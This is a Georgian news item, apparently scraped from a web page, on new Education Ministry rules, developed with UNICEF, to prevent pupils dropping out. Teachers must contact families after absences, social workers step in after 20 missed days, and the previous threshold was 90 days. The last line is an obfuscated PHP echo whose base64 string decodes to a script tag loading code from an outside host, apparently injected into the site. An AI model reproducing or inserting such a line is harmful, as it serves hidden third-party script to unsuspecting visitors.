celsiusi
ავერსი საქკაბელი
განათლებისა და მეცნიერების სამინისტრო UNICEF-თან და საერთაშორისო ექსპერტებთან თანამშრომლობით მოსწავლეთა სკოლის მიღმა დარჩენის პრევენციის რეგულაციებს აძლიერებს. ამის შესახებ ინფორმაციას სამინისტრო ავრცელებს. 
 
მათივე ინფორმაციით, ახალი რეგულაციები სკოლებს ავალდებულებს, მოსწავლის სკოლაში ან დისტანციური ფორმით ჩატარებულ გაკვეთილებზე გამოუცხადებლობის შემთხვევაში, რეაგირება მოახდინოს. საბოლოო ჯამში, იმისათვის, რომ მოზარდი სკოლის მიღმა არ აღმოჩნდეს, პროცესში მთელი განათლების სისტემა ერთვება. 
 
რეგულაციები რამდენიმე ეტაპს მოიცავს. პირველ ეტაპზე, მოსწავლის სკოლაში/გაკვეთილზე გამოუცხადებლობის შემთხვევაში, 10 დღის განმავლობაში კლასის დამრიგებელი უშუალოდ მუშაობს მოსწავლის ოჯახთან ან მის კანონიერ წარმომადგენელთან. ზედიზედ გაცდენილი 20 სასწავლო დღის შემდეგ კი, პროცესში განათლების სისტემის სოციალური მუშაკები ჩაერთვებიან, რომლებიც მოზარდის სასწავლო პროცესში დაბრუნების მიზნით იმუშავებენ მოსწავლესთან და მის კანონიერ წარმომადგენელთან.
 
განათლების სისტემა ყველა კანონიერ ბერკეტს გამოიყენებს მოზარდის სასწავლო პროცესში ჩასართავად. ახალი რეგულაციებით, მოსწავლე როგორც დასწრებითი, ისე დისტანციური სწავლების დროს სტატუსი შეჩერებისგან დაცულია.
 
ცნობისთვის, აქამდე სტატუსის შეჩერების საფუძვლად 90 სასწავლო დღის განმავლობაში სკოლის ზედიზედ გაცდენა ითვლებოდა, ხოლო სკოლას ჰქონდა ვალდებულება, მოზარდის სკოლაში დასაბრუნებლად გაეტარებინა საჭირო ღონისძიებები. 
 
რეგულაციების შესახებ სრული ინფორმაცია იხილეთ ბმულზე:
https://www.mes.gov.ge/content.php?id=12023&lang=geo
 
1197
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");